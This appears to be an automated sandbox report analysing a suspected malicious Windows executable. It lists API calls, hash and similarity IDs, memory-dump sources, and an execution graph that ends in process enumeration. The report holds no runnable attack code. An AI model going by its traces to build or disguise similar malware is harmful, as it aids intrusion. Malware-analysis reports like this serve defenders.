                                                                                                                            • ___TypeMatch.LIBVCRUNTIME ref: 6D760277
                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 6D7603C9
                                                                                                                            • CallUnexpected.LIBVCRUNTIME ref: 6D7603E4
                                                                                                                            Similarity
                                                                                                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                            • String ID: csm$csm$csm
                                                                                                                            • API String ID: 2751267872-393685449

                                                                                                                            APIs
                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,6D76411E,00000000,6D761C17,00000000,00000000,00000001,?,6D764297,00000022,FlsSetValue,6D76C390,6D76C398,00000000), ref: 6D7640D0
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeLibrary
                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                            • API String ID: 3664257935-537541572

                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32(00000001,?,6D75F2D1,6D75CBA8,6D75C56F,?,6D75C7A7,?,00000001,?,?,00000001,?,6D76FDC8,0000000C,6D75C8A0), ref: 6D75F6AA
                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6D75F6B8
                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6D75F6D1
                                                                                                                            • SetLastError.KERNEL32(00000000,6D75C7A7,?,00000001,?,?,00000001,?,6D76FDC8,0000000C,6D75C8A0,?,00000001,?), ref: 6D75F723
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3852720340-0

                                                                                                                            Strings
                                                                                                                            • C:\Users\user\Desktop\file.exe, xrefs: 6D76325F
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: C:\Users\user\Desktop\file.exe
                                                                                                                            • API String ID: 0-4010620828
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,9C40E07D,00000000,?,00000000,6D769992,000000FF,?,6D7614DF,?,?,6D7614B3,?), ref: 6D76157A
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6D76158C
                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000000,6D769992,000000FF,?,6D7614DF,?,?,6D7614B3,?), ref: 6D7615AE
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                            APIs
                                                                                                                            • __alloca_probe_16.LIBCMT ref: 6D765E49
                                                                                                                            • __alloca_probe_16.LIBCMT ref: 6D765F12
                                                                                                                            • __freea.LIBCMT ref: 6D765F79
                                                                                                                              • Part of subcall function 6D7627B2: HeapAlloc.KERNEL32(00000000,6D7637BC,?,?,6D7637BC,00000220,?,00000000,?), ref: 6D7627E4
                                                                                                                            • __freea.LIBCMT ref: 6D765F8C
                                                                                                                            • __freea.LIBCMT ref: 6D765F99
Memory Dump Source
• Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
• Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6d740000_file.jbxd
Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1096550386-0
                                                                                                                            APIs
                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6D75FC23,00000000,?,00000001,?,?,?,6D75FD12,00000001,FlsFree,6D76B5C8,FlsFree), ref: 6D75FC7F
                                                                                                                            • GetLastError.KERNEL32(?,6D75FC23,00000000,?,00000001,?,?,?,6D75FD12,00000001,FlsFree,6D76B5C8,FlsFree,00000000,?,6D75F771), ref: 6D75FC89
                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6D75FCB1
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                                            • String ID: api-ms-
                                                                                                                            • API String ID: 3177248105-2084034818
                                                                                                                            APIs
                                                                                                                            • GetConsoleOutputCP.KERNEL32(9C40E07D,00000000,00000000,?), ref: 6D766534
                                                                                                                              • Part of subcall function 6D763E11: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6D765F6F,?,00000000,-00000008), ref: 6D763E72
                                                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6D766786
                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6D7667CC
                                                                                                                            • GetLastError.KERNEL32 ref: 6D76686F
                                                                                                                            Similarity
                                                                                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2112829910-0
                                                                                                                            APIs
                                                                                                                            Similarity
                                                                                                                            • API ID: AdjustPointer
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1740715915-0
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6D763E11: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6D765F6F,?,00000000,-00000008), ref: 6D763E72
                                                                                                                            • GetLastError.KERNEL32 ref: 6D762AC1
                                                                                                                            • __dosmaperr.LIBCMT ref: 6D762AC8
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 6D762B02
                                                                                                                            • __dosmaperr.LIBCMT ref: 6D762B09
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1913693674-0
                                                                                                                            APIs
                                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 6D763EBC
                                                                                                                              • Part of subcall function 6D763E11: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6D765F6F,?,00000000,-00000008), ref: 6D763E72
                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6D763EF4
                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6D763F14
                                                                                                                            Similarity
                                                                                                                            • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 158306478-0
                                                                                                                            APIs
                                                                                                                            • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,6D767395,00000000,00000001,00000000,?,?,6D7668C3,?,00000000,00000000), ref: 6D767BED
                                                                                                                            • GetLastError.KERNEL32(?,6D767395,00000000,00000001,00000000,?,?,6D7668C3,?,00000000,00000000,?,?,?,6D766E66,00000000), ref: 6D767BF9
                                                                                                                              • Part of subcall function 6D767BBF: CloseHandle.KERNEL32(FFFFFFFE,6D767C09,?,6D767395,00000000,00000001,00000000,?,?,6D7668C3,?,00000000,00000000,?,?), ref: 6D767BCF
                                                                                                                            • ___initconout.LIBCMT ref: 6D767C09
                                                                                                                              • Part of subcall function 6D767B81: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6D767BB0,6D767382,?,?,6D7668C3,?,00000000,00000000,?), ref: 6D767B94
                                                                                                                            • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,6D767395,00000000,00000001,00000000,?,?,6D7668C3,?,00000000,00000000,?), ref: 6D767C1E
                                                                                                                            Similarity
                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2744216297-0
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6D7664D1: GetConsoleOutputCP.KERNEL32(9C40E07D,00000000,00000000,?), ref: 6D766534
                                                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,6D764C64,?), ref: 6D766F09
                                                                                                                            • GetLastError.KERNEL32(?,6D764C64,?,6D764AF7,00000000,?,00000000,6D764AF7,?,00000000,00000000,6D770268,0000002C,6D764B68,?), ref: 6D766F13
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                            • String ID: dLvm
                                                                                                                            • API String ID: 2915228174-2800093305
                                                                                                                            • Opcode ID: 301b146263ff4cd4c3b69899d1a446f2517a8e8782a26c8ff049f98a9b1582f4
                                                                                                                            • Instruction ID: 52dae31cd675f86c31a81eacd743adadb00972f4b2db78d771c2e3123be6b932
                                                                                                                            • Opcode Fuzzy Hash: 301b146263ff4cd4c3b69899d1a446f2517a8e8782a26c8ff049f98a9b1582f4
                                                                                                                            • Instruction Fuzzy Hash: AD61B6B180419AAFDF01CFA8CA44AEE7BB9BB05324F454199ED10A7205E331DA15CBE2
                                                                                                                            APIs
                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 6D75F12F
                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 6D75F1E3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                            • String ID: csm
                                                                                                                            • API String ID: 3480331319-1018135373
                                                                                                                            • Opcode ID: 19daa91a1c6b5365380b70b358afd92db74a0ec3bc53a4756479c3d19c94a53e
                                                                                                                            • Instruction ID: da1874a27492cfe1e4c5aa7fe9ff2bfdaf03e110b034871025637e473d760679
                                                                                                                            • Opcode Fuzzy Hash: 19daa91a1c6b5365380b70b358afd92db74a0ec3bc53a4756479c3d19c94a53e
                                                                                                                            • Instruction Fuzzy Hash: C041A434904259ABCF00DF68CA84BAEFBB5EF45338F108166E9149B351DB319A25CB93
                                                                                                                            APIs
                                                                                                                            • EncodePointer.KERNEL32(00000000,?), ref: 6D760414
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: EncodePointer
                                                                                                                            • String ID: MOC$RCC
                                                                                                                            • API String ID: 2118026453-2084237596
                                                                                                                            • Opcode ID: 03bcdf641d050e479b3730b4c83a1030f96aafcba16fb7f4fc714cf0bef6d19b
                                                                                                                            • Instruction ID: e91d61fd4e5288f6dbf6405d51d760c5cae8afb221c356e26d6aa069694b22af
                                                                                                                            • Opcode Fuzzy Hash: 03bcdf641d050e479b3730b4c83a1030f96aafcba16fb7f4fc714cf0bef6d19b
                                                                                                                            • Instruction Fuzzy Hash: 73417C71900249AFCF02CF94CA81EAEBBB5FF48324F1580A9FE0567251E7359950DB62

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:4.8%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:3.4%
                                                                                                                            Total number of Nodes:2000
                                                                                                                            Total number of Limit Nodes:30
API calls 73388->73389 73390 4034b8 73389->73390 73391 4047e8 3 API calls 73390->73391 73392 4034cf 73391->73392 73393 4047e8 3 API calls 73392->73393 73394 4034e9 73393->73394 73395 4047e8 3 API calls 73394->73395 73396 403500 73395->73396 73397 4047e8 3 API calls 73396->73397 73398 403517 73397->73398 73399 4047e8 3 API calls 73398->73399 73400 40352e 73399->73400 73401 4047e8 3 API calls 73400->73401 73402 403545 73401->73402 73403 4047e8 3 API calls 73402->73403 73404 40355c 73403->73404 73405 4047e8 3 API calls 73404->73405 73406 403573 73405->73406 73407 4047e8 3 API calls 73406->73407 73408 40358a 73407->73408 73409 4047e8 3 API calls 73408->73409 73410 4035a4 73409->73410 73411 4047e8 3 API calls 73410->73411 73412 4035bb 73411->73412 73413 4047e8 3 API calls 73412->73413 73414 4035d2 73413->73414 73415 4047e8 3 API calls 73414->73415 73416 4035e9 73415->73416 73417 4047e8 3 API calls 73416->73417 73418 403600 73417->73418 73419 4047e8 3 API calls 73418->73419 73420 403617 73419->73420 73421 4047e8 3 API calls 73420->73421 73422 40362d 73421->73422 73423 4047e8 3 API calls 73422->73423 73424 403643 73423->73424 73425 4047e8 3 API calls 73424->73425 73426 40365d 73425->73426 73427 4047e8 3 API calls 73426->73427 73428 403674 73427->73428 73429 4047e8 3 API calls 73428->73429 73430 40368b 73429->73430 73431 4047e8 3 API calls 73430->73431 73432 4036a1 73431->73432 73433 4047e8 3 API calls 73432->73433 73434 4036b8 73433->73434 73435 4047e8 3 API calls 73434->73435 73436 4036cf 73435->73436 73437 4047e8 3 API calls 73436->73437 73438 4036e3 73437->73438 73439 4047e8 3 API calls 73438->73439 73440 4036f9 73439->73440 73441 4047e8 3 API calls 73440->73441 73442 403713 73441->73442 73443 4047e8 3 API calls 73442->73443 73444 40372a 73443->73444 73445 4047e8 3 API calls 73444->73445 73446 403741 73445->73446 73447 4047e8 3 API calls 73446->73447 73448 403758 73447->73448 73449 4047e8 3 API calls 73448->73449 73450 40376f 73449->73450 73451 4047e8 3 API calls 
73450->73451 73452 403786 73451->73452 73453 4047e8 3 API calls 73452->73453 73454 40379a 73453->73454 73455 4047e8 3 API calls 73454->73455 73456 4037b1 73455->73456 73457 4047e8 3 API calls 73456->73457 73458 4037cb 73457->73458 73459 4047e8 3 API calls 73458->73459 73460 4037e2 73459->73460 73461 4047e8 3 API calls 73460->73461 73462 4037f6 73461->73462 73463 4047e8 3 API calls 73462->73463 73464 40380a 73463->73464 73465 4047e8 3 API calls 73464->73465 73466 403821 73465->73466 73467 4047e8 3 API calls 73466->73467 73468 403838 73467->73468 73469 4047e8 3 API calls 73468->73469 73470 40384f 73469->73470 73471 4047e8 3 API calls 73470->73471 73472 403866 73471->73472 73473 4047e8 3 API calls 73472->73473 73474 403880 73473->73474 73475 4047e8 3 API calls 73474->73475 73476 403897 73475->73476 73477 4047e8 3 API calls 73476->73477 73478 4038ae 73477->73478 73479 4047e8 3 API calls 73478->73479 73480 4038c5 73479->73480 73481 4047e8 3 API calls 73480->73481 73482 4038db 73481->73482 73483 4047e8 3 API calls 73482->73483 73484 4038f2 73483->73484 73485 4047e8 3 API calls 73484->73485 73486 403906 73485->73486 73487 4047e8 3 API calls 73486->73487 73488 40391d 73487->73488 73489 4047e8 3 API calls 73488->73489 73490 403937 73489->73490 73491 4047e8 3 API calls 73490->73491 73492 40394e 73491->73492 73493 4047e8 3 API calls 73492->73493 73494 403965 73493->73494 73495 4047e8 3 API calls 73494->73495 73496 40397c 73495->73496 73497 4047e8 3 API calls 73496->73497 73498 403993 73497->73498 73499 4047e8 3 API calls 73498->73499 73500 4039aa 73499->73500 73501 4047e8 3 API calls 73500->73501 73502 4039c1 73501->73502 73503 4047e8 3 API calls 73502->73503 73504 4039d8 73503->73504 73505 4047e8 3 API calls 73504->73505 73506 4039f2 73505->73506 73507 4047e8 3 API calls 73506->73507 73508 403a09 73507->73508 73509 4047e8 3 API calls 73508->73509 73510 403a20 73509->73510 73511 4047e8 3 API calls 73510->73511 73512 403a37 73511->73512 73513 4047e8 3 API calls 73512->73513 
73514 403a4e 73513->73514 73515 4047e8 3 API calls 73514->73515 73516 403a65 73515->73516 73517 4047e8 3 API calls 73516->73517 73518 403a7c 73517->73518 73519 4047e8 3 API calls 73518->73519 73520 403a90 73519->73520 73521 4047e8 3 API calls 73520->73521 73522 403aaa 73521->73522 73523 4047e8 3 API calls 73522->73523 73524 403ac1 73523->73524 73525 4047e8 3 API calls 73524->73525 73526 403ad7 73525->73526 73527 4047e8 3 API calls 73526->73527 73528 403aee 73527->73528 73529 4047e8 3 API calls 73528->73529 73530 403b05 73529->73530 73531 4047e8 3 API calls 73530->73531 73532 403b1c 73531->73532 73533 4047e8 3 API calls 73532->73533 73534 403b33 73533->73534 73535 4047e8 3 API calls 73534->73535 73536 403b4a 73535->73536 73537 4047e8 3 API calls 73536->73537 73538 403b61 73537->73538 73539 4047e8 3 API calls 73538->73539 73540 403b75 73539->73540 73541 4047e8 3 API calls 73540->73541 73542 403b8c 73541->73542 73543 4047e8 3 API calls 73542->73543 73544 403ba3 73543->73544 73545 4047e8 3 API calls 73544->73545 73546 403bba 73545->73546 73547 4047e8 3 API calls 73546->73547 73548 403bd1 73547->73548 73549 4047e8 3 API calls 73548->73549 73550 403be8 73549->73550 73551 4047e8 3 API calls 73550->73551 73552 403bff 73551->73552 73553 4047e8 3 API calls 73552->73553 73554 403c19 73553->73554 73555 4047e8 3 API calls 73554->73555 73556 403c30 73555->73556 73557 4047e8 3 API calls 73556->73557 73558 403c47 73557->73558 73559 4047e8 3 API calls 73558->73559 73560 403c5e 73559->73560 73561 4047e8 3 API calls 73560->73561 73562 403c75 73561->73562 73563 4047e8 3 API calls 73562->73563 73564 403c8c 73563->73564 73565 4047e8 3 API calls 73564->73565 73566 403ca3 73565->73566 73567 4047e8 3 API calls 73566->73567 73568 403cb7 73567->73568 73569 4047e8 3 API calls 73568->73569 73570 403cd1 73569->73570 73571 4047e8 3 API calls 73570->73571 73572 403ce8 73571->73572 73573 4047e8 3 API calls 73572->73573 73574 403cff 73573->73574 73575 4047e8 3 API calls 73574->73575 73576 403d16 
73575->73576 73577 4047e8 3 API calls 73576->73577 73578 403d2c 73577->73578 73579 4047e8 3 API calls 73578->73579 73580 403d43 73579->73580 73581 4047e8 3 API calls 73580->73581 73582 403d57 73581->73582 73583 4047e8 3 API calls 73582->73583 73584 403d6e 73583->73584 73585 4047e8 3 API calls 73584->73585 73586 403d85 73585->73586 73587 4047e8 3 API calls 73586->73587 73588 403d9c 73587->73588 73589 4047e8 3 API calls 73588->73589 73590 403db3 73589->73590 73591 4047e8 3 API calls 73590->73591 73592 403dca 73591->73592 73593 4047e8 3 API calls 73592->73593 73594 403de1 73593->73594 73595 4047e8 3 API calls 73594->73595 73596 403df8 73595->73596 73597 4047e8 3 API calls 73596->73597 73598 403e0f 73597->73598 73599 4047e8 3 API calls 73598->73599 73600 403e26 73599->73600 73601 4047e8 3 API calls 73600->73601 73602 403e40 73601->73602 73603 4047e8 3 API calls 73602->73603 73604 403e57 73603->73604 73605 4047e8 3 API calls 73604->73605 73606 403e6e 73605->73606 73607 4047e8 3 API calls 73606->73607 73608 403e84 73607->73608 73609 4047e8 3 API calls 73608->73609 73610 403e9b 73609->73610 73611 4047e8 3 API calls 73610->73611 73612 403eb2 73611->73612 73613 4047e8 3 API calls 73612->73613 73614 403ec9 73613->73614 73615 4047e8 3 API calls 73614->73615 73616 403ee0 73615->73616 73617 4047e8 3 API calls 73616->73617 73618 403efa 73617->73618 73619 4047e8 3 API calls 73618->73619 73620 403f10 73619->73620 73621 4047e8 3 API calls 73620->73621 73622 403f27 73621->73622 73623 4047e8 3 API calls 73622->73623 73624 403f3e 73623->73624 73625 4047e8 3 API calls 73624->73625 73626 403f55 73625->73626 73627 4047e8 3 API calls 73626->73627 73628 403f6c 73627->73628 73629 4047e8 3 API calls 73628->73629 73630 403f80 73629->73630 73631 4047e8 3 API calls 73630->73631 73632 403f97 73631->73632 73633 4047e8 3 API calls 73632->73633 73634 403fb1 73633->73634 73635 4047e8 3 API calls 73634->73635 73636 403fc7 73635->73636 73637 4047e8 3 API calls 73636->73637 73638 403fde 73637->73638 
73639 4047e8 3 API calls 73638->73639 73640 403ff2 73639->73640 73641 4047e8 3 API calls 73640->73641 73642 404009 73641->73642 73643 4047e8 3 API calls 73642->73643 73644 404020 73643->73644 73645 4047e8 3 API calls 73644->73645 73646 404037 73645->73646 73647 4047e8 3 API calls 73646->73647 73648 40404e 73647->73648 73649 4047e8 3 API calls 73648->73649 73650 404067 73649->73650 73651 4047e8 3 API calls 73650->73651 73652 40407e 73651->73652 73653 4047e8 3 API calls 73652->73653 73654 404094 73653->73654 73655 4047e8 3 API calls 73654->73655 73656 4040a8 73655->73656 73657 4047e8 3 API calls 73656->73657 73658 4040bf 73657->73658 73659 4047e8 3 API calls 73658->73659 73660 4040d6 73659->73660 73661 4047e8 3 API calls 73660->73661 73662 4040ed 73661->73662 73663 4047e8 3 API calls 73662->73663 73664 404104 73663->73664 73665 4047e8 3 API calls 73664->73665 73666 40411e 73665->73666 73667 4047e8 3 API calls 73666->73667 73668 404135 73667->73668 73669 4047e8 3 API calls 73668->73669 73670 40414c 73669->73670 73671 4047e8 3 API calls 73670->73671 73672 404163 73671->73672 73673 4047e8 3 API calls 73672->73673 73674 404179 73673->73674 73675 4047e8 3 API calls 73674->73675 73676 40418d 73675->73676 73677 4047e8 3 API calls 73676->73677 73678 4041a1 73677->73678 73679 4047e8 3 API calls 73678->73679 73680 4041b8 73679->73680 73681 4047e8 3 API calls 73680->73681 73682 4041d2 73681->73682 73683 4047e8 3 API calls 73682->73683 73684 4041e8 73683->73684 73685 4047e8 3 API calls 73684->73685 73686 4041ff 73685->73686 73687 4047e8 3 API calls 73686->73687 73688 404216 73687->73688 73689 4047e8 3 API calls 73688->73689 73690 40422d 73689->73690 73691 4047e8 3 API calls 73690->73691 73692 404244 73691->73692 73693 4047e8 3 API calls 73692->73693 73694 404258 73693->73694 73695 4047e8 3 API calls 73694->73695 73696 40426e 73695->73696 73697 4047e8 3 API calls 73696->73697 73698 404288 73697->73698 73699 4047e8 3 API calls 73698->73699 73700 40429f 73699->73700 73701 4047e8 3 
API calls 73700->73701 73702 4042b6 73701->73702 73703 4047e8 3 API calls 73702->73703 73704 4042cc 73703->73704 73705 4047e8 3 API calls 73704->73705 73706 4042e3 73705->73706 73707 4047e8 3 API calls 73706->73707 73708 4042fa 73707->73708 73709 4047e8 3 API calls 73708->73709 73710 404311 73709->73710 73711 4047e8 3 API calls 73710->73711 73712 404325 73711->73712 73713 4047e8 3 API calls 73712->73713 73714 40433c 73713->73714 73715 4047e8 3 API calls 73714->73715 73716 404353 73715->73716 73717 4047e8 3 API calls 73716->73717 73718 40436a 73717->73718 73719 4047e8 3 API calls 73718->73719 73720 404381 73719->73720 73721 4047e8 3 API calls 73720->73721 73722 404395 73721->73722 73723 4047e8 3 API calls 73722->73723 73724 4043ac 73723->73724 73725 4047e8 3 API calls 73724->73725 73726 4043c3 73725->73726 73727 4047e8 3 API calls 73726->73727 73728 4043da 73727->73728 73729 4047e8 3 API calls 73728->73729 73730 4043f1 73729->73730 73731 4047e8 3 API calls 73730->73731 73732 404408 73731->73732 73733 4047e8 3 API calls 73732->73733 73734 40441c 73733->73734 73735 4047e8 3 API calls 73734->73735 73736 404433 73735->73736 73737 4047e8 3 API calls 73736->73737 73738 40444a 73737->73738 73739 4047e8 3 API calls 73738->73739 73740 40445e 73739->73740 73741 4047e8 3 API calls 73740->73741 73742 404472 73741->73742 73743 4047e8 3 API calls 73742->73743 73744 404486 73743->73744 73745 4047e8 3 API calls 73744->73745 73746 4044a0 73745->73746 73747 4047e8 3 API calls 73746->73747 73748 4044b7 73747->73748 73749 4047e8 3 API calls 73748->73749 73750 4044cd 73749->73750 73751 4047e8 3 API calls 73750->73751 73752 4044e4 73751->73752 73753 4047e8 3 API calls 73752->73753 73754 4044fa 73753->73754 73755 4047e8 3 API calls 73754->73755 73756 404511 73755->73756 73757 4047e8 3 API calls 73756->73757 73758 404528 73757->73758 73759 4047e8 3 API calls 73758->73759 73760 40453e 73759->73760 73761 4047e8 3 API calls 73760->73761 73762 404558 73761->73762 73763 4047e8 3 API calls 
73762->73763 73764 40456f 73763->73764 73765 4047e8 3 API calls 73764->73765 73766 404586 73765->73766 73767 4047e8 3 API calls 73766->73767 73768 40459d 73767->73768 73769 4047e8 3 API calls 73768->73769 73770 4045b4 73769->73770 73771 4047e8 3 API calls 73770->73771 73772 4045cb 73771->73772 73773 4047e8 3 API calls 73772->73773 73774 4045e2 73773->73774 73775 4047e8 3 API calls 73774->73775 73776 4045f9 73775->73776 73777 4047e8 3 API calls 73776->73777 73778 404612 73777->73778 73779 4047e8 3 API calls 73778->73779 73780 404629 73779->73780 73781 4047e8 3 API calls 73780->73781 73782 404642 73781->73782 73783 4047e8 3 API calls 73782->73783 73784 404656 73783->73784 73785 4047e8 3 API calls 73784->73785 73786 40466d 73785->73786 73787 4047e8 3 API calls 73786->73787 73788 404684 73787->73788 73789 4047e8 3 API calls 73788->73789 73790 40469b 73789->73790 73791 4047e8 3 API calls 73790->73791 73792 4046b2 73791->73792 73793 4047e8 3 API calls 73792->73793 73794 4046cc 73793->73794 73795 4047e8 3 API calls 73794->73795 73796 4046e3 73795->73796 73797 4047e8 3 API calls 73796->73797 73798 4046f9 73797->73798 73799 4047e8 3 API calls 73798->73799 73800 404710 73799->73800 73801 4047e8 3 API calls 73800->73801 73802 404727 73801->73802 73803 4047e8 3 API calls 73802->73803 73804 40473d 73803->73804 73805 4047e8 3 API calls 73804->73805 73806 404754 73805->73806 73807 4047e8 3 API calls 73806->73807 73808 404768 73807->73808 73809 4047e8 3 API calls 73808->73809 73810 404781 73809->73810 73811 4047e8 3 API calls 73810->73811 73812 404797 73811->73812 73813 4047e8 3 API calls 73812->73813 73814 4047ae 73813->73814 73815 4047e8 3 API calls 73814->73815 73816 4047c5 73815->73816 73817 4047e8 3 API calls 73816->73817 73818 4047dc 73817->73818 73818->72826 75137 42f109 73819->75137 73821 41258e CreateToolhelp32Snapshot Process32First 73822 4125c2 Process32Next 73821->73822 73823 4125ef CloseHandle 73821->73823 73822->73823 73824 4125d4 StrCmpCA 73822->73824 75138 42f165 
